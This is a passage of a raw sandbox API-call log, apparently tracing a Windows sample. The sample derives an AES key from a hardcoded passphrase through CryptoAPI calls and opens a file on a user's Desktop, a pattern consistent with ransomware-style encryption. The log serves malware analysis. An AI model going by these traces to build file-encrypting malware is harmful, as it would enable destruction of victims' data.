lpMem=0x43c9d40 | out: hHeap=0x1780000) returned 1 [0118.348] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43921b8 | out: hHeap=0x1780000) returned 1 [0118.348] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0118.348] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb80 | out: hHeap=0x1780000) returned 1 [0118.348] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bd8 | out: hHeap=0x1780000) returned 1 [0118.348] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfba8 | out: hHeap=0x1780000) returned 1 [0118.348] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2320 | out: hHeap=0x1780000) returned 1 [0118.348] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc48 | out: hHeap=0x1780000) returned 1 [0118.348] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0118.348] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa68 | out: hHeap=0x1780000) returned 1 [0118.348] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0118.348] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc98 | out: hHeap=0x1780000) returned 1 [0118.348] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0118.348] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x436a2f0 | out: hHeap=0x1780000) returned 1 [0118.348] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0118.348] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0118.348] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0118.348] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0118.348] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0118.348] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0118.348] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0118.348] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0118.348] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0118.348] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa18 | out: hHeap=0x1780000) returned 1 [0118.348] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e8cd8 | out: hHeap=0x1780000) returned 1 [0118.348] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0118.348] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0118.348] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0118.348] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0118.348] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf888 | out: hHeap=0x1780000) returned 1 [0118.349] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cc8 | out: hHeap=0x1780000) returned 1 [0118.349] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2160 | out: hHeap=0x1780000) returned 1 [0118.349] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21e0 | out: hHeap=0x1780000) returned 1 [0118.364] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0118.364] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0118.364] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x43c9d40, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0118.364] CloseHandle (hObject=0x258) returned 1 [0118.364] FreeLibrary (hLibModule=0x772d0000) returned 1 [0118.364] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0118.364] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\1YTxNPPGwWg.wav", lpFindFileData=0x144ed28 | out: lpFindFileData=0x144ed28*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9a8072b0, ftCreationTime.dwHighDateTime=0x1d5e2a8, ftLastAccessTime.dwLowDateTime=0xe074f000, ftLastAccessTime.dwHighDateTime=0x1d5ec4b, ftLastWriteTime.dwLowDateTime=0xe074f000, ftLastWriteTime.dwHighDateTime=0x1d5ec4b, nFileSizeHigh=0x0, nFileSizeLow=0x158aa, dwReserved0=0x43c34c0, dwReserved1=0x8, cFileName="1YTxNPPGwWg.wav", cAlternateFileName="1YTXNP~1.WAV")) returned 0x41ac140 [0118.365] FindClose (in: hFindFile=0x41ac140 | out: hFindFile=0x41ac140) returned 1 [0118.365] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0118.365] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0118.365] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0118.365] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0118.365] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0118.365] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0118.365] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x1796d68, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0118.365] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0118.365] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x1797088, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0118.365] CryptAcquireContextA (in: phProv=0x144ea08, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x144ea08*=0x41a5250) returned 1 [0118.366] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0118.366] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0118.366] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0118.366] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0118.366] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0118.366] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0118.366] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0118.366] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0118.366] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0118.366] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0118.366] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x43caa60, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0118.366] CryptCreateHash (in: hProv=0x41a5250, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x144e778 | out: phHash=0x144e778) returned 1 [0118.366] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0118.367] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2b18, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0118.367] CharLowerBuffW (in: lpsz="byte[34]", cchLength=0x8 | out: lpsz="byte[34]") returned 0x8 [0118.367] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0118.367] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2bd8, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0118.367] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0118.367] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0118.367] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0118.367] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x43ca7a8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0118.367] CryptHashData (hHash=0x41ac500, pbData=0x17e2728, dwDataLen=0x22, dwFlags=0x1) returned 1 [0118.367] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0118.367] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0118.367] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0118.367] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0118.367] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x43caa18, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0118.367] CryptDeriveKey (in: hProv=0x41a5250, Algid=0x6610, hBaseData=0x41ac500, dwFlags=0x1, phKey=0x144e778 | out: phKey=0x144e778*=0x41ac140) returned 1 [0118.367] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0118.367] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0118.367] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0118.367] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x1796e88, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0118.367] CryptDestroyHash (hHash=0x41ac500) returned 1 [0118.368] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2920 [0118.368] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e9128 [0118.368] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2780 [0118.368] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafb8 [0118.368] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadf0 [0118.368] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf40 [0118.368] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2840 [0118.368] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf28 [0118.368] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafe8 [0118.368] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadd8 [0118.368] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2790 [0118.368] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2870 [0118.368] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfea0 [0118.368] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabb0 [0118.368] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2800 [0118.368] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac28 [0118.368] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2840 [0118.368] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab08 [0118.368] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27b0 [0118.368] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0118.368] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e9128 [0118.368] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0118.368] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac100 [0118.369] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0118.369] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac100 | out: hHeap=0x1780000) returned 1 [0118.369] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0118.369] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac700 | out: hHeap=0x1780000) returned 1 [0118.369] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0118.369] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0118.369] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf888 [0118.369] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e78 [0118.369] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0118.369] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0118.369] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0118.369] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0118.369] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0118.369] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0118.369] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac200 [0118.369] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x43eb450 [0118.369] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0118.369] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0118.369] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\1YTxNPPGwWg.wav" (normalized: "c:\\users\\fd1hvy\\desktop\\1ytxnppgwwg.wav"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x258 [0118.369] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0118.369] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144eeb0 | out: lpNewFilePointer=0x0) returned 1 [0118.369] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb30 [0118.370] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0118.370] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0118.370] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0118.370] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e78 | out: hHeap=0x1780000) returned 1 [0118.370] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0118.370] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf888 | out: hHeap=0x1780000) returned 1 [0118.370] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0118.370] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0118.370] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0118.370] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0118.370] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0118.370] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0118.370] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0118.370] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0118.370] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0118.370] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0118.370] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac100 [0118.370] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0118.370] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac100 | out: hHeap=0x1780000) returned 1 [0118.370] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0118.370] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0118.370] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb58 [0118.370] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0118.370] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0118.370] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0118.370] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0118.370] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0118.370] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2530 [0118.370] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0118.371] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797128 [0118.371] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797128 | out: hHeap=0x1780000) returned 1 [0118.371] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0118.371] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0118.371] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0118.371] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0118.371] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0118.371] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0118.371] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0118.371] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0118.371] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0118.371] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0118.371] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0118.371] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0118.371] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0118.371] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0118.371] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0118.371] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x43921f0 [0118.371] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0118.371] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x60) returned 0x43596c0 [0118.371] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0118.371] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x43920a0 [0118.371] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0118.371] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392490 [0118.371] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43596c0 | out: hHeap=0x1780000) returned 1 [0118.371] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0118.372] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0118.372] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0118.372] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43921f0 | out: hHeap=0x1780000) returned 1 [0118.372] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0118.372] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43920a0 | out: hHeap=0x1780000) returned 1 [0118.372] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0118.372] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0118.372] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0118.372] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0118.372] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90f8 [0118.372] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0118.372] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90f8 | out: hHeap=0x1780000) returned 1 [0118.372] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0118.372] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392490 | out: hHeap=0x1780000) returned 1 [0118.372] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0118.372] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0118.372] HeapFree (in: 